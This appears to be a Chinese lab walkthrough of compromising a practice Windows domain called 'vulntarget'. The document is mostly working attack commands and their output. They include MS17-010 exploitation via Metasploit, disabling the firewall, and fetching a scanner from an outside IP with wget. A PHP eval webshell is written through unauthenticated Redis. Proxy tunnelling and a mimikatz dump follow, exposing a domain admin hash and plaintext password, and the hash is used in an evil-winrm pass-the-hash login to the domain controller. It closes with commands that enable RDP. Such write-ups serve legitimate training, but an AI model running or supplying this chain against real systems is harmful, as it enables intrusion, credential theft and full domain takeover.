192.168.52.132 外网目标ip

fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[~/vulntarget]
└─# ./fscan_amd64 -h 192.168.52.132 -p 1-10000

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.132 is alive
[*] Icmp alive hosts len is: 1
192.168.52.132:110 open
192.168.52.132:80 open
192.168.52.132:135 open
192.168.52.132:139 open
192.168.52.132:445 open
192.168.52.132:1188 open
192.168.52.132:3336 open
192.168.52.132:5357 open
192.168.52.132:8750 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.52.132
[->]win7-PC
[->]192.168.52.132
[->]10.0.20.128
[*] WebTitle: http://192.168.52.132:8750 code:403 len:564 title:403 Forbidden
[+] 192.168.52.132 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.132:5357 code:503 len:326 title:Service Unavailable
[*] WebTitle: http://192.168.52.132 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.132 [通达OA]
[+] http://192.168.52.132 tongda-user-session-disclosure
[+] http://192.168.52.132:8750 tongda-user-session-disclosure
已完成 9/9
[*] 扫描结束,耗时: 18.303575184s

1
2
3
4
信息整理一下 
192.168.52.132 通达存在漏洞 MS-17 名字Win7-PC 常规端口
10.0.20.128 内网地址

直接打MS17就行了

1
2
3
4
search MS17
use 0
set rhosts 192.168.52.132
run

image-20231113103421107

直接上线 开始信息收集一下

image-20231113103608843

1
2
解决乱码
chcp 65001
1
2
3
netsh advfirewall set allprofiles state off  关闭防火墙命令

不关闭防火墙的话 MSF和cs的马都上不去
1
2
3
4
5
6
7
8
9
10
11
12
13
Ethernet adapter �������� 2:

Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::55ef:46ff:3f4:a6b3%13
IPv4 Address. . . . . . . . . . . : 10.0.20.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter ��������:

Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::1c54:a862:b6a5:1f6c%11
IPv4 Address. . . . . . . . . . . : 192.168.52.132

收集到的信息

1
2
192.168.52.132  外网地址
10.0.20.128 内网地址

上传一个fscan扫一下内网 并且上代理

1
2
3
4
5
wget http://101.42.39.110:3389/fscan64.exe

这里我是用msf的upload模块来上传这个fscan64.exe

upload fscan64.exe C:\\
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
C:\>fscan64.exe -h 10.0.20.0/24 -p 1-10000
fscan64.exe -h 10.0.20.0/24 -p 1-10000

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.20.128 is alive
(icmp) Target 10.0.20.130 is alive
[*] Icmp alive hosts len is: 2
10.0.20.130:80 open
10.0.20.128:80 open
10.0.20.128:110 open
10.0.20.128:135 open
10.0.20.130:139 open
10.0.20.128:139 open
10.0.20.130:135 open
10.0.20.128:445 open
10.0.20.130:445 open
10.0.20.128:1188 open
10.0.20.128:3336 open
10.0.20.128:5357 open
10.0.20.130:5985 open
10.0.20.130:6379 open
10.0.20.128:8750 open
[*] alive ports len is: 15
start vulscan
[+] 10.0.20.128 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]10.0.20.128
[->]win7-PC
[->]192.168.52.132
[->]10.0.20.128
[*] WebTitle: http://10.0.20.128:8750 code:403 len:564 title:403 Forbidden
[*] WebTitle: http://10.0.20.128 code:200 len:10065 title:通达OA网络智能办公系统
[*] NetInfo:
[*]10.0.20.130
[->]win2016
[->]10.0.10.111
[->]10.0.20.130
[+] Redis:10.0.20.130:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] WebTitle: http://10.0.20.130 code:200 len:11 title:None
[+] InfoScan:http://10.0.20.128 [通达OA]
[*] WebTitle: http://10.0.20.128:5357 code:503 len:326 title:Service Unavailable
[*] NetBios: 10.0.20.130 win2016.vulntarget.com Windows Server 2016 Datacenter 14393
[*] WebTitle: http://10.0.20.130:5985 code:404 len:315 title:Not Found
[+] http://10.0.20.128 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 poc-yaml-tongda-oa-v11.9-api.ali.php-fileupload
已完成 15/15
[*] 扫描结束,耗时: 56.0155853s

信息整理一下 一共就是两个ip

1
2
3
4
5
6
7
8
10.0.20.128
10.0.20.130 这个就是域里的一台机器 5985 6379 win2016.vulntarget.com
域 vulntarget.com 6379端口是存在未授权的

这里的这台win16机器的网络地址

10.0.20.130
10.0.10.111

上stowaway挂代理

1
upload agent.exe C:\\

image-20231113104956522

然后扫一下目录 发现phpinfo.php文件

image-20231113105109436

找到网站目录 然后因为redis纯在未授权 然后我们直接上传shell就行了

1
2
3
4
5
6
7
8

config set dir "C:/phpStudy/PHPTutorial/WWW/"

config set dbfilename 1.php

set 1 "<?php @eval($_POST['1']);?>"

save

image-20231113105410071

成功写入 然后上蚁剑

image-20231113105550525

上传fscan扫一下内网

1
2
3
4
5
6
7
   IPv4 地址 . . . . . . . . . . . . : 10.0.20.130
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::a195:ff2a:a6da:221c%12
IPv4 地址 . . . . . . . . . . . . : 10.0.10.111

但是蚁剑这个终端的话太抽象了 fscan扫不了 于是上Viper

image-20231113110229946

上线成功 开始扫一下内网

1
fscan64.exe -h 10.0.10.0/24 -p 1-10000

image-20231113110402882

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
C:\phpStudy\PHPTutorial\WWW>type result.txt
type result.txt
10.0.10.110:53 open
10.0.10.110:88 open
10.0.10.111:80 open
10.0.10.110:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.111:139 open
10.0.10.110:389 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:464 open
10.0.10.110:593 open
10.0.10.110:636 open
10.0.10.110:3268 open
10.0.10.110:3269 open
10.0.10.111:5985 open
10.0.10.110:5985 open
10.0.10.111:6379 open
10.0.10.110:9389 open
[+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php
[*] WebTitle: http://10.0.10.111 code:200 len:11 title:None
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found
[*] NetInfo:
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.110:139 open
10.0.10.110:88 open
10.0.10.111:80 open
10.0.10.111:139 open
10.0.10.110:53 open
10.0.10.110:389 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:464 open
10.0.10.110:593 open
10.0.10.110:636 open
10.0.10.110:3268 open
10.0.10.110:3269 open
10.0.10.111:5985 open
10.0.10.110:5985 open
10.0.10.111:6379 open
10.0.10.110:9389 open
[+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php
[*] WebTitle: http://10.0.10.111 code:200 len:11 title:None
[*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found
[*] NetInfo:
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found

发现域控了

1
2
10.0.10.110 DC VULNTARGET\WIN2019    开了个5985端口  winrm服务

收集一下域内win16的信息 看看有没有能到域控的方法

1
2
3
跑一下sharphound  上传sharphound上去  然后跑就行了

SharpHound.exe --CollectionMethods All --Domain vulntarget.com --ExcludeDCs

image-20231113111238366

这里就是关键了 因为域管登录过win16这台机器 所以留下了凭据

我们直接上mimikatz跑logonpassword就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
Authentication Id : 0 ; 329364 (00000000:00050694)
Session : Interactive from 1
User Name : win2016
Domain : VULNTARGET
Logon Server : WIN2019
Logon Time : 2023/11/11 22:30:17
SID : S-1-5-21-3795598892-1521228294-2653055093-1601
msv :
[00000005] Primary
* Username : win2016
* Domain : VULNTARGET
* NTLM : dfc8d2bfa540a0a6e2248a82322e654e
* SHA1 : cfa10f59337120a5ea6882b11c1c9f451f5f4ea6
* DPAPI : 27bd7cc4802079a6e008ed2d917c4323
tspkg :
wdigest :
* Username : win2016
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 71684 (00000000:00011804)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : e0cd419213811fd910ca6c3c42d764e7
* SHA1 : cd721f807e68ce07a4d0fe80b9356e93986d5ef1
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
ssp :
credman :

Authentication Id : 0 ; 71573 (00000000:00011795)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : 27 7d f9 fa 4a f9 61 25 60 4e 75 42 f7 d9 c6 a0 60 c7 f1 eb 48 b3 73 bf 64 0e dd 5b 92 46 f1 2a cb 7d 19 a4 38 19 aa fb 8a a7 56 ca 40 fb 07 3b f3 c7 d4 ca b7 f3 32 49 56 92 69 78 a0 f4 66 5b 8a 40 46 9e ac 7e dc a7 18 85 68 68 65 d1 b3 1a b3 8b 76 e8 c8 ec 18 58 78 86 10 0e ae 1d 2f b5 ac 9c 29 2c c9 6e d6 eb f3 70 91 fd f4 12 11 e0 8d 48 e4 89 20 73 f4 c0 ae d3 d0 f1 45 e0 be e3 39 6a 8f 7e a4 08 4c a7 41 3d ef 23 ad 19 f4 c1 21 b1 9e 81 39 99 33 d3 8f 83 d6 49 02 59 f7 b9 6d 63 bb 2e 50 be 8f 4e f4 37 7a fa 13 95 93 d6 80 96 c0 d1 7b c6 2c 90 ca 1e 0a da 42 8b 3e 92 c7 65 85 45 41 a4 b6 76 21 35 e2 96 94 a4 07 28 c3 49 d9 31 05 24 28 07 de 8c 64 fa 8d 93 d3 ed ec 4c 75 e5 e1 05 bc 6f 6b 41 ef ed d9 f2 43 a4
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-20
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 41061 (00000000:0000a065)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID :
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 548857 (00000000:00085ff9)
Session : CachedInteractive from 1
User Name : Administrator
Domain : VULNTARGET
Logon Server : WIN2019
Logon Time : 2023/11/11 22:31:21
SID : S-1-5-21-3795598892-1521228294-2653055093-500
msv :
[00000005] Primary
* Username : Administrator
* Domain : VULNTARGET
* NTLM : c7c654da31ce51cbeecfef99e637be15
* SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f
* DPAPI : 4df31630e621c2278c303c0940d878ff
tspkg :
wdigest :
* Username : Administrator
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : Administrator
* Domain : VULNTARGET.COM
* Password : Admin@666
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

然后找了这个域管的hash值

1
2
3
4
5
6
[00000005] Primary
* Username : Administrator
* Domain : VULNTARGET
* NTLM : c7c654da31ce51cbeecfef99e637be15
* SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f
* DPAPI : 4df31630e621c2278c303c0940d878ff

因为这个域管在10段 所以得上二级代理

https://www.freebuf.com/sectool/359841.htmlStowaway

早win7机器上再开一个端口

image-20231113111634856

然后使用win16机器连接这个端口

1
agent.exe -c 10.0.20.128:1235

image-20231113111804433

image-20231113111823827

然后给proxifier再加上一条规则

image-20231113111851438

再proxychains这个配置文件上再加上这一条就行了

image-20231113111938654

因为我们获取了域管的hash值 那么我们就直接evil-winrm登录就行了

1
proxychains evil-winrm -i 10.0.10.110 -u Administrator -H "c7c654da31ce51cbeecfef99e637be15"

image-20231113112046978

拿下了

最后讲一下怎么再没开启3389的情况下开启3389端口

1
2
3
4
5
6

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

这里得获取到域控之后才有权限

(这里我没尝试成功 先存着 以后可能有用)

image-20231113113141354

就是第二步的时候出错

关闭防火墙命令

1
netsh advfirewall set allprofiles state off

新的知识点就是学会了这个 二级代理

image-20231113113913305

二级代理同样能上 viper 但是注意的一点就是 防火墙必须得关掉

1
netsh advfirewall set allprofiles state off

image-20231113114204412

image-20231113114152747